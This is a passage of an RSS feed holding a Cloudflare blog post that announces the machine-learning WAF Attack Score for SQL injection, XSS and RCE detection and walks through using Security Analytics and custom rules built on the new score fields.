            <dc:creator>Radwa Radwan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Stop attacks before they are known: making the Cloudflare WAF smarter]]></title>
            <link>https://blog.cloudflare.com/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/</link>
            <pubDate>Fri, 09 Dec 2022 14:00:00 GMT</pubDate>
            <description><![CDATA[ Today we are making the WAF smarter by increasing availability of our new machine learning powered enhancement, the WAF Attack Score! ]]></description>
            <content:encoded><![CDATA[ <p><i></i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1Y8psmovGouHLkHICnduJb/739b4209e553b9e87f163ef8662e1a51/image5-2.png" />
            
            </figure><p><a href="https://www.cloudflare.com/waf/">Cloudflare’s WAF</a> helps site owners keep their application safe from attackers. It does this by analyzing traffic with the <a href="https://developers.cloudflare.com/waf/managed-rulesets/reference/cloudflare-managed-ruleset/">Cloudflare Managed Rules</a>: handwritten highly specialized rules that detect and stop malicious payloads. But they have a problem: if a rule is not written for a specific attack, it will not detect it.</p><p>Today, we are solving this problem by making our <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a> smarter and announcing our WAF attack scoring system in general availability.</p><p>Customers on our Enterprise Core and Advanced Security bundles will have gradual access to this new feature. All remaining Enterprise customers will gain access over the coming months.</p><p>Our WAF attack scoring system, fully complementary to our Cloudflare Managed Rules, classifies all requests using a model trained on observed true positives across the Cloudflare network, allowing you to detect (and block) evasion, bypass and new attack techniques before they are publicly known.</p>
    <div>
      <h2>The problem with signature based WAFs</h2>
      <a href="#the-problem-with-signature-based-wafs">
        
      </a>
    </div>
    <p>Attackers trying to infiltrate web applications often use known or recently disclosed payloads. The Cloudflare WAF has been built to handle these attacks very well. The Cloudflare Managed Ruleset and the Cloudflare <a href="https://en.wikipedia.org/wiki/OWASP">OWASP</a> Managed Ruleset are in fact continuously updated and aimed at protecting web applications against known threats while minimizing false positives.</p><p>Things become harder with not publicly known attacks, often referred to as <a href="https://en.wikipedia.org/wiki/Zero-day_(computing)">zero-days</a>. While our teams do their best to research new threat vectors and keep the Cloudflare Managed rules updated, human speed becomes a limiting factor. Every time a new vector is found a window of opportunity becomes available for attackers to bypass mitigations.</p><p>One well known example was the <a href="/cve-2021-44228-log4j-rce-0-day-mitigation/">Log4j RCE attack</a>, where we had to deploy frequent rule updates as new bypasses were discovered by changing the known <a href="/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/">attack patterns</a>.</p>
    <div>
      <h2>The solution: complement signatures with a machine learning scoring model</h2>
      <a href="#the-solution-complement-signatures-with-a-machine-learning-scoring-model">
        
      </a>
    </div>
    <p>Our WAF attack scoring system is a machine-learning-powered enhancement to Cloudflare’s WAF. It scores every request with a probability of it being malicious. You can then use this score when implementing WAF Custom Rules to keep your application safe alongside existing Cloudflare Managed Rules.</p>
    <div>
      <h3>How do we use machine learning in Cloudflare’s WAF?</h3>
      <a href="#how-do-we-use-machine-learning-in-cloudflares-waf">
        
      </a>
    </div>
    <p>In any classification problem, the quality of the training set directly relates to the quality of the classification output, so a lot of effort was put into preparing the training data.</p><p>And this is where we used a Cloudflare superpower: we took advantage of Cloudflare’s network visibility by gathering millions of true positive samples generated by our existing signature based WAF and further enhanced it by using techniques covered in “<a href="/data-generation-and-sampling-strategies/">Improving the accuracy of our machine learning WAF</a>”.</p><p>This allowed us to train a <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">model</a> that is able to classify, given an HTTP request, the probability that the request contains a malicious payload, but more importantly, to classify when a request is very similar to a known true positive but yet sufficiently different to avoid a managed rule match.</p><p>The model runs inline to HTTP traffic and as of today it is optimized for three attack categories: SQL Injection (SQLi), <a href="https://www.cloudflare.com/learning/security/threats/cross-site-scripting/">Cross Site Scripting (XSS)</a>, and a wide range of Remote Code Execution (RCE) attacks such as shell injection, PHP injection, Apache Struts type compromises, Apache log4j, and similar attacks that result in RCE. We plan to add additional attack types in the future.</p><p>The output scores are similar to the <a href="/introducing-bot-analytics/">Bot Management</a> scores; they range between 1 and 99, where low scores indicate malicious or likely malicious and high scores indicate clean or likely clean HTTP request.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/57Kl8w8yxxC4ZZ7DOu2tUB/aeb585344cca76782bb44949547d22f5/image4-5.png" />
            
            </figure>
    <div>
      <h3>Proving immediate value</h3>
      <a href="#proving-immediate-value">
        
      </a>
    </div>
    <p>As one example of the effectiveness of this new system, on October 13, 2022 <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-42889">CVE-2022-42889</a> was identified as a “Critical Severity” in <a href="https://github.com/apache/commons-text">Apache Commons Text</a> affecting versions 1.5 through 1.9.</p><p>The payload used in the attack, although not immediately blocked by our Cloudflare Managed Rules, was correctly identified (by scoring very low) by our attack scoring system. This allowed us to protect endpoints and identify the attack with zero time to deploy. Of course, we also still updated the Cloudflare Managed Rules to cover the new attack vector, as this allows us to improve our training data further completing our feedback loop.</p>
    <div>
      <h2>Know what you don’t know with the new Security Analytics</h2>
      <a href="#know-what-you-dont-know-with-the-new-security-analytics">
        
      </a>
    </div>
    <p>In addition to the attack scoring system, we have another big announcement: our new Security Analytics! You can read more about this in <a href="/security-analytics">the official announcement</a>.</p><p>Using the new security analytics you can view the attack score distribution regardless of whether the requests were blocked or not allowing you to explore potentially malicious attacks before deploying any rules.</p><p>The view won’t only show the WAF Attack Score but also Bot Management and Content Scanning with the ability to mix and match filters as you desire.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1MJ8mVGxP5c3qKrOMXs0H9/133a8f226856815f52cd8eb720b4d58c/image1-10.png" />
            
            </figure>
    <div>
      <h2>How to use the WAF Attack Score and Security Analytics</h2>
      <a href="#how-to-use-the-waf-attack-score-and-security-analytics">
        
      </a>
    </div>
    <p>Let’s go on a tour to spot attacks using the new Security Analytics, and then use the WAF Attack Scores to mitigate them.</p>
    <div>
      <h3>Starting with Security Analytics</h3>
      <a href="#starting-with-security-analytics">
        
      </a>
    </div>
    <p>This new view has the power to show you everything in one place about your traffic. You have tens of filters to mix and match from, top statistics, multiple interactive graph distributions, as well as the log samples to verify your insights. In essence this gives you the ability to preview a number of filters without the need to create WAF Custom Rules in the first place.</p><p><b>Step 1</b> - access the new Security Analytics: To Access the new Security Analytics in the dashboard, head over to the “Security” tab (<b>Security &gt; Analytics</b>), the previous (<b>Security &gt; Overview</b>) still exists under (<b>Security &gt; Events</b>). You must have access to at least the WAF Attack Score to be able to see the new Security Analytics for the time being.</p><p><b>Step 2</b> - explore insights: On the new analytics page, you will view the time distribution of your entire traffic, along with many filters on the right side showing distributions for several features including the WAF Attack Score and the Bot Management score, to make it super easy to apply interesting filters we added the “Insights” section.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3V7Pd5okduXI6BO4jeap8x/3c83d5906069bab7c8f9f379e5b8f917/image7.png" />
            
            </figure><p>By choosing the “Attack Analysis” option you see a stacked chart overview of how your traffic looks from the WAF Attack Score perspective.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/135BsLRB5Hu7wQ9LjylJ9P/878088234864a20d5937a3c3384486bd/image6.png" />
            
            </figure><p><b>Step 3</b> - filter on attack traffic: A good place to start is to look for unmitigated HTTP requests classified as attacks. You can do this by using the attack score sliders on the right-hand side or by selecting any of the insights’ filters which are easy to use one click shortcuts. All charts will be updated automatically according to the selected filters.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1OzYL2gC8J4Eul4rGy7WTZ/82f2d21878900893672b8fcac74571f6/image8.png" />
            
            </figure><p><b>Step 4</b> - verify the attack traffic: This can be done by expanding the sampled logs below the traffic distribution graph, for instance in the below expanded log, you can see a very low RCE score indicating an “Attack”, along with Bot score indicating that the request was “Likely Automated”. Looking at the “Path” field, we can confirm that indeed this is a malicious request. Note that not all fields are currently logged/shown. For example a request might receive a low score due to a malicious payload in the HTTP body which cannot be easily verified in the sample logs today.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6EBEaIA2jadEY4X65fR3Sd/079466cb5fba24e54ef2eddf00fe0352/image3-2.png" />
            
            </figure><p><b>Step 5</b> - create a rule to mitigate the attack traffic: Once you have verified that your filter is not matching false positives, by using a single click on the “Create custom rule” button, you will be directed to the WAF Custom Rules builder with all your filters pre-populated and ready for you to “Deploy”.</p>
    <div>
      <h3>Attack scores in Security Event logs</h3>
      <a href="#attack-scores-in-security-event-logs">
        
      </a>
    </div>
    <p>WAF Attack Scores are also available in <a href="https://developers.cloudflare.com/logs/reference/log-fields/zone/http_requests/">HTTP logs</a>, and by navigating to (<b>Security &gt; Events)</b> when expanding any of the event log samples:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ypnJCxaCSKPyKpplU9ZpZ/1265e36223de98d5714a8f113173cc40/image2-7.png" />
            
            </figure><p>Note that all the new fields are available in WAF Custom Rules and WAF Rate Limiting Rules. These are documented in our developer <a href="https://developers.cloudflare.com/waf/about/waf-ml/">docs</a>: <code>cf.waf.score</code>, <code>cf.waf.score.xss</code>, <code>cf.waf.score.sqli</code>, and <code>cf.waf.score.rce</code>.</p><p>Although the easiest way to use these fields is by starting from our new Security Analytics dashboard as described above, you can use them as is when building rules and of course mixing with any other available field. The following example deploys a “Log” Action rule for any request with aggregate WAF Attack Score (<code>cf.waf.score</code>) less than 40.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Ij7IQl7b2fRa5Gmv3Cofo/e6e7a823b8e58f45af324abc40c2e0bd/image9.png" />
            
            </figure>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>This is just step one of many to make our Cloudflare WAF truly “intelligent”. In addition to rolling this new technology out to more customers, we are already working on providing even better visibility and cover additional attack vectors. For all that and more, stay tuned!</p> ]]></content:encoded>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[WAF Attack Score]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">1Hx5ZYnFOhSRubpCFHlREO</guid>
            <dc:creator>Radwa Radwan</dc:creator>
        </item>
    </channel>
</rss>